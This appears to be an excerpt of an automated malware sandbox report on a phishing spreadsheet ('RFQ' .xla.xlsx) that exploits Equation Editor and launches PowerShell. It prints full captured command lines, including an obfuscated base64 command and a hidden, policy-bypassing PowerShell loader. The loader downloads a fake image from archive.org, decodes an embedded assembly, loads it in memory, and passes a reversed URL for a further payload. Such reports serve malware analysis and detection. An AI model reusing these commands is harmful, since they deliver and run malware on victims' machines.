                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: 9EC30000.0.drInitial sample: OLE indicators vbamacros = False
                Source: RFQ No. 109078906v.xla.xlsxInitial sample: OLE indicators encrypted = True

                Data Obfuscation

                barindex
                Suspicious powershell command line found
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CB50
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032F434 push esp; ret 9_2_0032F453
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032D63A push ecx; ret 9_2_0032D63B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032F412 push esp; ret 9_2_0032F413
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00328E08 push edx; ret 9_2_00328E0B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00325A65 push edx; ret 9_2_00325A6F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032D642 push ecx; ret 9_2_0032D643
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032D8B0 push eax; ret 9_2_0032D8D7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032FAB6 push edx; ret 9_2_0032FAB7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003312BA push ecx; ret 9_2_003312BB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003266B8 push edx; ret 9_2_003266BB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032CCEB push ecx; ret 9_2_0032CF5F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032D8D8 push ecx; ret 9_2_0032D917
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003312C2 push ecx; ret 9_2_003312C3
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003266C0 push edx; ret 9_2_003266C3
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032C536 push eax; ret 9_2_0032C537
